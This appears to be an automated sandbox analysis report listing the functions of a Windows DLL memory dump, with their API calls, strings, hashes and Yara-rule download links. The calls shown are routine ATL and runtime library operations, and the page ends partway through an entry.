Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Getcvt
String ID: Unknown exception$false$true
API String ID: 1921796781-1228625832
Opcode ID: 05c45469d2db2ae0f40c00946a0b454431f9d8960909ed18856055b1852c50df
Instruction ID: 7aca5d305367aef7d9698cf8647fcd51f6f16b83e11a8243b94ad884eee07b8e
Opcode Fuzzy Hash: 05c45469d2db2ae0f40c00946a0b454431f9d8960909ed18856055b1852c50df
Instruction Fuzzy Hash: 6451BC31A042458FDB11CFE8DA407DABFB9EF81314F1485AEDC445B395C776990ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E7DE6A0, Relevance: 16.9, APIs: 11, Instructions: 353stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6E7DE4E0: CharNextW.USER32(?,?,00000000,?,C000008C,00000001,?,972AE1C9,00000000,00000000), ref: 6E7DE51E
Part of subcall function 6E7DE4E0: CharNextW.USER32(00000000,?,?,00000000), ref: 6E7DE54B
Part of subcall function 6E7DE4E0: CharNextW.USER32(745EEEF0,?,?,00000000), ref: 6E7DE564
Part of subcall function 6E7DE4E0: CharNextW.USER32(745EEEF0,?,?,00000000), ref: 6E7DE56F
Part of subcall function 6E7DE4E0: CharNextW.USER32(00000001,?,?,00000000), ref: 6E7DE5DE

lstrcmpiW.KERNEL32(?,6E817A28,?,972AE1C9,C000008C,00000000,?,?,00000000,6E809276,000000FF,?,6E7DF727,00000000,00000000,C000008C), ref: 6E7DE723
lstrcmpiW.KERNEL32(?,6E817A2C,?,6E7DF727,00000000,00000000,C000008C,C000008C), ref: 6E7DE73A

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: CharNext$lstrcmpi
String ID:
API String ID: 3586774192-0
Opcode ID: e2dee2331302c82e4ccd80757503a37ea58c9576fac01d44c7bdcd6e75612b5f
Instruction ID: 11acf0cfe258b64788c5d0d2c5d97876575ea92a0d85d638db478ae5f4e87e2d
Opcode Fuzzy Hash: e2dee2331302c82e4ccd80757503a37ea58c9576fac01d44c7bdcd6e75612b5f
Instruction Fuzzy Hash: 8BD1A431D0022DCADB26CF94CE58BD9B7B9EB59310F0504EAE649A7260D730AE9DCF50

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E7E60, Relevance: 16.7, APIs: 11, Instructions: 156memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000000,00000000,6E7D8355,6E7D8357,00000000,00000000,972AE1C9,?,00000000,?,Function_00018A10,6E81BDD0,000000FE,?,6E7D8355), ref: 6E7E7ED4
__alloca_probe_16.LIBCMT ref: 6E7E7EF9
MultiByteToWideChar.KERNEL32(00000000,00000000,6E7D8355,?,00000000,00000000,?,Function_00018A10,6E81BDD0,000000FE,?,6E7D8355), ref: 6E7E7F4F
SysAllocString.OLEAUT32(00000000), ref: 6E7E7F5A
_com_issue_error.COMSUPP ref: 6E7E7F9F
GetLastError.KERNEL32(80070057,972AE1C9,?,00000000,?,Function_00018A10,6E81BDD0,000000FE,?,6E7D8355), ref: 6E7E7FA4
_com_issue_error.COMSUPP ref: 6E7E7FB7
_com_issue_error.COMSUPP ref: 6E7E7FC1
GetLastError.KERNEL32(8007000E,00000000,?,00000000,?,Function_00018A10,6E81BDD0,000000FE,?,6E7D8355), ref: 6E7E7FD7
_com_issue_error.COMSUPP ref: 6E7E7FEA
_com_issue_error.COMSUPP ref: 6E7E7FF4

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString__alloca_probe_16
String ID:
API String ID: 3079088546-0
Opcode ID: fe1e3275180e1fc3b50e4d0ff44d5fdfc3b2babc9c798a7dc64cc4b1ec5cd9b9
Instruction ID: adc047f50ba430f4f81e8a072ac049d4da049d0e722523c6ba5593e609a88f13
Opcode Fuzzy Hash: fe1e3275180e1fc3b50e4d0ff44d5fdfc3b2babc9c798a7dc64cc4b1ec5cd9b9
Instruction Fuzzy Hash: C941F871A00209ABDB00CFE8C944BEEBBA8EF49714F10466AF519E7AD1D7349502CBE5

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E2AE0, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 195registryCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6E81EAA4,?,?), ref: 6E7E2B2A
GetClassInfoExW.USER32 ref: 6E7E2B5D
GetClassInfoExW.USER32 ref: 6E7E2B74
LeaveCriticalSection.KERNEL32(6E81EAA4), ref: 6E7E2B83
LoadCursorW.USER32(6E7D0000,00007F00), ref: 6E7E2BD7
GetClassInfoExW.USER32 ref: 6E7E2C2E
RegisterClassExW.USER32 ref: 6E7E2C45
LeaveCriticalSection.KERNEL32(6E81EAA4), ref: 6E7E2CF3

Strings

ATL:%p, xrefs: 6E7E2BF8

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Class$CriticalInfoSection$Leave$CursorEnterLoadRegister
String ID: ATL:%p
API String ID: 269841140-4171052921
Opcode ID: 018c944419b3e50cf8ff07c5bae6a57bd24f73556b346d53dc8f7ccf454a13c2
Instruction ID: a51447af9ce52aa3163cba725d94dd1dd998752f85cfade62ba1bb3c6c407d1b
Opcode Fuzzy Hash: 018c944419b3e50cf8ff07c5bae6a57bd24f73556b346d53dc8f7ccf454a13c2
Instruction Fuzzy Hash: 9271A330904B469FDB20CFA8CA455AAB7F5FF59314F104A2DE84A97E60E730B984CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E0760, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 107timeCOMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 6E7E0778
GetDeviceCaps.GDI32(00000000,0000005A), ref: 6E7E07A5
MulDiv.KERNEL32(00000008,00000000), ref: 6E7E07AE
CreateFontW.GDI32(00000000), ref: 6E7E07B7
ReleaseDC.USER32 ref: 6E7E07C4
SetTimer.USER32(?,000003E8,000003E8,00000000), ref: 6E7E07D9

Part of subcall function 6E7E1A90: BeginPaint.USER32(?,?), ref: 6E7E1AD3
Part of subcall function 6E7E1A90: GetParent.USER32(?), ref: 6E7E1ADC
Part of subcall function 6E7E1A90: GetClientRect.USER32 ref: 6E7E1AF2
Part of subcall function 6E7E1A90: CreateCompatibleDC.GDI32(?), ref: 6E7E1AF8
Part of subcall function 6E7E1A90: CreateCompatibleBitmap.GDI32(?,?,?), ref: 6E7E1B1A
Part of subcall function 6E7E1A90: SelectObject.GDI32(00000000,00000000), ref: 6E7E1B26
Part of subcall function 6E7E1A90: SelectObject.GDI32(00000000,?), ref: 6E7E1B38
Part of subcall function 6E7E1A90: SendMessageW.USER32(?,00000014,00000000,00000000), ref: 6E7E1B51
Part of subcall function 6E7E1A90: SendMessageW.USER32(?,0000000F,?,00000000), ref: 6E7E1B5F
Part of subcall function 6E7E1A90: SetBkMode.GDI32(?,00000001), ref: 6E7E1B68
Part of subcall function 6E7E1A90: SetTextColor.GDI32(?,00FFFFFF), ref: 6E7E1B74
Part of subcall function 6E7E1A90: GetClientRect.USER32 ref: 6E7E1B86
Part of subcall function 6E7E1A90: ClientToScreen.USER32(?,?), ref: 6E7E1B94
Part of subcall function 6E7E1A90: ClientToScreen.USER32(?,?), ref: 6E7E1BA9
Part of subcall function 6E7E1A90: ClientToScreen.USER32(?,?), ref: 6E7E1BCB

DeleteObject.GDI32(?), ref: 6E7E0800

Strings

Arial, xrefs: 6E7E077E

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Client$CreateObjectScreen$CompatibleMessageRectSelectSend$BeginBitmapCapsColorDeleteDeviceFontModePaintParentReleaseTextTimer
String ID: Arial
API String ID: 1525433823-493054409
Opcode ID: ff417b620a34d0f89749fe245c88aa89f3466903252618cc31484ff039efadc9
Instruction ID: ce4ddfe0e742bb969b84397d5854ec8d6d579265cd580516d9cb9b376251e4ee
Opcode Fuzzy Hash: ff417b620a34d0f89749fe245c88aa89f3466903252618cc31484ff039efadc9
Instruction Fuzzy Hash: DF31E231340606EFEB109FA8DD4AB9A7BA8FB55311F104026F505DA6E0CBB6E861CFD0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7F9844, Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E7F9858

Part of subcall function 6E7F9268: HeapFree.KERNEL32(00000000,00000000,?,6E7F69EA,000000FF,000000FF), ref: 6E7F927E
Part of subcall function 6E7F9268: GetLastError.KERNEL32(6E7F6065,?,6E7F69EA,000000FF,000000FF), ref: 6E7F9290

_free.LIBCMT ref: 6E7F9864
_free.LIBCMT ref: 6E7F986F
_free.LIBCMT ref: 6E7F987A
_free.LIBCMT ref: 6E7F9885
_free.LIBCMT ref: 6E7F9890
_free.LIBCMT ref: 6E7F989B
_free.LIBCMT ref: 6E7F98A6
_free.LIBCMT ref: 6E7F98B1
_free.LIBCMT ref: 6E7F98BF

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 72e873eb8f9a789c837642b3454eb32d006c17b4cdb83dd9b2e19732a4a3daa5
Instruction ID: e31e0fc5783499c9f8d7ce9aeb86320e831159880ff7e477d7bc2ed25361e031
Opcode Fuzzy Hash: 72e873eb8f9a789c837642b3454eb32d006c17b4cdb83dd9b2e19732a4a3daa5
Instruction Fuzzy Hash: A611C076505108EFCB09DFD4CA44CDD3BADEF15654F814AA0BA089F631DB31EA52DB80

Uniqueness

Uniqueness Score: -1.00%

Function 6E7DD940, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 100libraryloaderregistryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(Advapi32.dll,972AE1C9,?,?,?,6E809130,000000FF), ref: 6E7DD979
GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedW), ref: 6E7DD989
GetModuleHandleW.KERNEL32(Advapi32.dll,972AE1C9,?,?,?,6E809130,000000FF), ref: 6E7DD9E9
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 6E7DD9F9
RegDeleteKeyW.ADVAPI32(?,?), ref: 6E7DDA48

Strings

RegDeleteKeyExW, xrefs: 6E7DD9F3
RegDeleteKeyTransactedW, xrefs: 6E7DD983
Advapi32.dll, xrefs: 6E7DD974, 6E7DD9E4

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc$Delete
String ID: Advapi32.dll$RegDeleteKeyExW$RegDeleteKeyTransactedW
API String ID: 2668475584-1053001802
Opcode ID: 38548268f65470729ee6647cacc3d45ea8c4d91e3f3aa8297e51697a8388547c
Instruction ID: 0a0c187aecff3d11aaecfd5909291dd6ae6826f54678a2ec1ef869a2ccade3ec
Opcode Fuzzy Hash: 38548268f65470729ee6647cacc3d45ea8c4d91e3f3aa8297e51697a8388547c
Instruction Fuzzy Hash: B5310632648605EFDB10CF99DE04F95BBA4E746710F00C16EE91897790D736A914CFE4

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D8730, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 73COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6E7D8779
VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 6E7D87A1
VariantClear.OLEAUT32(?), ref: 6E7D87B9

Part of subcall function 6E7D84A0: SysFreeString.OLEAUT32(?), ref: 6E7D84FE
Part of subcall function 6E7D84A0: SysAllocString.OLEAUT32(?), ref: 6E7D8569

_com_issue_error.COMSUPP ref: 6E7D87DF

Strings

name, xrefs: 6E7D8878
page, xrefs: 6E7D901B, 6E7D9046
value, xrefs: 6E7D8A00
counter, xrefs: 6E7D8C6B, 6E7D8C96

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$String$AllocChangeClearFreeInitType_com_issue_error
String ID: counter$name$page$value
API String ID: 2722580932-1733285648
Opcode ID: d9d01c84cdfa9385aa7c6a67f30b7c562d18b8d85459f4940855436544c84432
Instruction ID: 66bbaa9dbc21ea680411f9d1881f5eb764927bbce983aafa4e101b9d7eb8fbc5
Opcode Fuzzy Hash: d9d01c84cdfa9385aa7c6a67f30b7c562d18b8d85459f4940855436544c84432
Instruction Fuzzy Hash: BD119371A04509ABDB10DFE4CA49BDEB7FCFB09724F10456AE805E7650E735A909CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E7958, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58libraryCOMMON

Download Yara Rule

APIs

DecodePointer.KERNEL32(?,?,?,6E7E7C9D,6E81FD10,C000008C,?,?,6E7E26EC,?,972AE1C9,00000000,00000000,6E808FA0,000000FF), ref: 6E7E796A
LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,?,?,6E7E7C9D,6E81FD10,C000008C,?,?,6E7E26EC,?,972AE1C9,00000000,00000000), ref: 6E7E797F
DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,000000FF), ref: 6E7E79FB

Strings

AtlThunk_InitData, xrefs: 6E7E79A7
AtlThunk_FreeData, xrefs: 6E7E79D5
AtlThunk_DataToCode, xrefs: 6E7E79BE
AtlThunk_AllocateData, xrefs: 6E7E7990
atlthunk.dll, xrefs: 6E7E797A

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: DecodePointer$LibraryLoad
String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
API String ID: 1423960858-1745123996
Opcode ID: 87b5df66f10c0e23bf95058ac9ba6877defff43ba599417ad47901dc90c74766
Instruction ID: 1216d9ba4d6602e399eeda4cb613d78196305ad1642de0b19f6908aeefbf91c9
Opcode Fuzzy Hash: 87b5df66f10c0e23bf95058ac9ba6877defff43ba599417ad47901dc90c74766
Instruction Fuzzy Hash: C801AD714046426BCF03DAB8AE05BDA3B555F1324EF100864F8087A7E3DB92A304CAD9

Uniqueness

Uniqueness Score: -1.00%

Function 6E800961, Relevance: 13.8, APIs: 9, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e57c3dae9cd4012d24a03869411e541f8c61229236603946833e1433ccc6db27
Instruction ID: e10a0ab8026179b3c460b52ef98d413799cc6b601ff7acc75f8013e0afbbdabf
Opcode Fuzzy Hash: e57c3dae9cd4012d24a03869411e541f8c61229236603946833e1433ccc6db27
Instruction Fuzzy Hash: 08C1B27494424ADFEB41CFE9CDA4BEDBBB4AF0A314F044D85E814AB391E7709941CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E7FB501, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMON

Download Yara Rule

APIs

Part of subcall function 6E7F9964: GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E7EE3E6,6E81BFB8,0000000C,00000004,00000001,00000004,?,6E7D46B5,00000000,00000000), ref: 6E7F9968
Part of subcall function 6E7F9964: SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E7D46B5,00000000,00000000), ref: 6E7F9A0C
Part of subcall function 6E7F9964: _abort.LIBCMT ref: 6E7F9A12

_memcmp.LIBVCRUNTIME ref: 6E7FB7AB
_free.LIBCMT ref: 6E7FB81C
_free.LIBCMT ref: 6E7FB835
_free.LIBCMT ref: 6E7FB867
_free.LIBCMT ref: 6E7FB870
_free.LIBCMT ref: 6E7FB87C

Strings

C, xrefs: 6E7FB669

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorLast$_abort_memcmp
String ID: C
API String ID: 1679612858-1037565863
Opcode ID: 771b2f95849ce0b8da1c9ab4435880e6318165926cfb077871307b19e608e33f
Instruction ID: eee018b993f66fafaf903336f8f541d48170d2d4b809deb5aab6c5b67840fa4f
Opcode Fuzzy Hash: 771b2f95849ce0b8da1c9ab4435880e6318165926cfb077871307b19e608e33f
Instruction Fuzzy Hash: 73B14875A0521ADFDB24DFA8C988A9DB7B4FF48304F1045EAD809A7364D730AE91CF80

Uniqueness

Uniqueness Score: -1.00%

Function 6E7F9964, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(000000FF,ios_base::failbit set,6E7EE3E6,6E81BFB8,0000000C,00000004,00000001,00000004,?,6E7D46B5,00000000,00000000), ref: 6E7F9968
_free.LIBCMT ref: 6E7F99BF
_free.LIBCMT ref: 6E7F99F3
SetLastError.KERNEL32(00000000,?,?,?,00000000,00000008,000000FF,?,6E7D46B5,00000000,00000000), ref: 6E7F9A00
SetLastError.KERNEL32(00000000,00000008,000000FF,?,6E7D46B5,00000000,00000000), ref: 6E7F9A0C
_abort.LIBCMT ref: 6E7F9A12

Strings

ios_base::failbit set, xrefs: 6E7F9966

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$_free$_abort
String ID: ios_base::failbit set
API String ID: 3160817290-3924258884
Opcode ID: ddbdfa0670072dd3dc1524854a53ab21bb25b90099946a34e03deace055d3b34
Instruction ID: bc5a8574010186b9676d439b0ca3ba56b6d8e411cfcc5ac2e3c9c7dd22408560
Opcode Fuzzy Hash: ddbdfa0670072dd3dc1524854a53ab21bb25b90099946a34e03deace055d3b34
Instruction Fuzzy Hash: 22110831114902EADB42DEF94F08F9A312DAFD2775B154B25F529927F4DF208907CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E7FEB1A, Relevance: 12.2, APIs: 8, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,6E7ED7FA,6E7ED7FA,?,?,?,6E7FED6B,00000001,00000001,F9E85006), ref: 6E7FEB74
__alloca_probe_16.LIBCMT ref: 6E7FEBAC
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,6E7FED6B,00000001,00000001,F9E85006,?,?,?), ref: 6E7FEBFA
__alloca_probe_16.LIBCMT ref: 6E7FEC91
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F9E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 6E7FECF4
__freea.LIBCMT ref: 6E7FED01

Part of subcall function 6E7F92A2: HeapAlloc.KERNEL32(00000000,00000103,000000FF,?,6E7E865C,00000105,000000FF,24448D6E,00000000,?,6E7D14D7,?,00000103,000000FF), ref: 6E7F92D4

__freea.LIBCMT ref: 6E7FED0A
__freea.LIBCMT ref: 6E7FED2F

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 2597970681-0
Opcode ID: 27737ffb3468309f8d0e05e90cb8d8b77d258a4d5ca546f93bd7f20c98498f2f
Instruction ID: 4889bf53a15855d3bb1397667d9af267b49914bba1f568517138186818ca70c6
Opcode Fuzzy Hash: 27737ffb3468309f8d0e05e90cb8d8b77d258a4d5ca546f93bd7f20c98498f2f
Instruction Fuzzy Hash: E551F87261021BEFEB158FE4CE94EAB37A9EB40764F144A29FD14D7264DB34DC42CA50

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E7A64, Relevance: 12.1, APIs: 8, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,6E7E7C0D,00000000), ref: 6E7E7A88
HeapAlloc.KERNEL32(00000000), ref: 6E7E7A8F

Part of subcall function 6E7E7B5A: IsProcessorFeaturePresent.KERNEL32(0000000C,6E7E7A76,00000000,?,6E7E7C0D,00000000), ref: 6E7E7B5C

InterlockedPopEntrySList.KERNEL32(00000000,00000000,?,6E7E7C0D,00000000), ref: 6E7E7A9F
VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 6E7E7AC6
RaiseException.KERNEL32(C0000017,00000000,00000000,00000000), ref: 6E7E7ADA
InterlockedPopEntrySList.KERNEL32(00000000), ref: 6E7E7AED
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6E7E7B00

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocEntryHeapInterlockedListVirtual$ExceptionFeatureFreePresentProcessProcessorRaise
String ID:
API String ID: 2460949444-0
Opcode ID: b880fe0dba0bef1bd18e2a0e1c467ec29efafe7714e4ac16106318556b915d94
Instruction ID: ce48ba471d0d0cb49ad2f8e886c8859118f3f46e01b7e83b5e2ea2b06921f489
Opcode Fuzzy Hash: b880fe0dba0bef1bd18e2a0e1c467ec29efafe7714e4ac16106318556b915d94
Instruction Fuzzy Hash: 31118672641A12BBEB115AAC8D48F67265DEF46785F110875FA0DE69D1D720CC00CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E00F0, Relevance: 10.8, APIs: 7, Instructions: 267COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6E820478,972AE1C9), ref: 6E7E014D
GetModuleFileNameW.KERNEL32(?,00000104), ref: 6E7E01D4
LoadTypeLib.OLEAUT32(?,00000000), ref: 6E7E0205
LoadRegTypeLib.OLEAUT32(6E818538,00000000,00000000,?,00000000), ref: 6E7E022D
EnterCriticalSection.KERNEL32(6E820494), ref: 6E7E03F0
LeaveCriticalSection.KERNEL32(6E820494), ref: 6E7E0406

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$EnterLoadType$FileLeaveModuleName
String ID:
API String ID: 1976781235-0
Opcode ID: d23773af3976a51f94968bf3d492bf9cd600522fea5eabe43201b1bd2f2912ce
Instruction ID: 1524c3d8fc90b9e917073a17a9dc155e33a1466c050332e7cafc20454dff754c
Opcode Fuzzy Hash: d23773af3976a51f94968bf3d492bf9cd600522fea5eabe43201b1bd2f2912ce
Instruction Fuzzy Hash: 8DB19E74901219DFDB10CFA4CA58B99B7B5AF5A300F1084E8E809E7B60EB359E45CF60

Uniqueness

Uniqueness Score: -1.00%

Function 6E8040B1, Relevance: 10.7, APIs: 7, Instructions: 204COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6E804120
_free.LIBCMT ref: 6E80412E
_free.LIBCMT ref: 6E80425C
_free.LIBCMT ref: 6E804267

Memory Dump Source

Source File: 00000000.00000002.1000774837.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000000.00000002.1000713850.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1000926791.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1001197385.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1001237848.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: f66b4417f90a30d30a17ca28cd1d197991816e6ea5d0b24c67d223c94d8c5f75
Instruction ID: aba73a1163829c1b7b1eca376e25c7821b4e651c74565704b6807c04ae3556b8
Opcode Fuzzy Hash: f66b4417f90a30d30a17ca28cd1d197991816e6ea5d0b24c67d223c94d8c5f75
Instruction Fuzzy Hash: 0F61BE72A44209EFDB50CFE8C941BDEBBF8EF95720F104969E954EB290D7309942CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E33D0, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 196COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(6E7D0000,?,00000104), ref: 6E7E34AD
GetModuleHandleW.KERNEL32(00000000), ref: 6E7E3527

Strings

REGISTRY, xrefs: 6E7E3660
Module, xrefs: 6E7E35D2
APPID, xrefs: 6E7E346D
Module_Raw, xrefs: 6E7E3603

Memory Dump Source

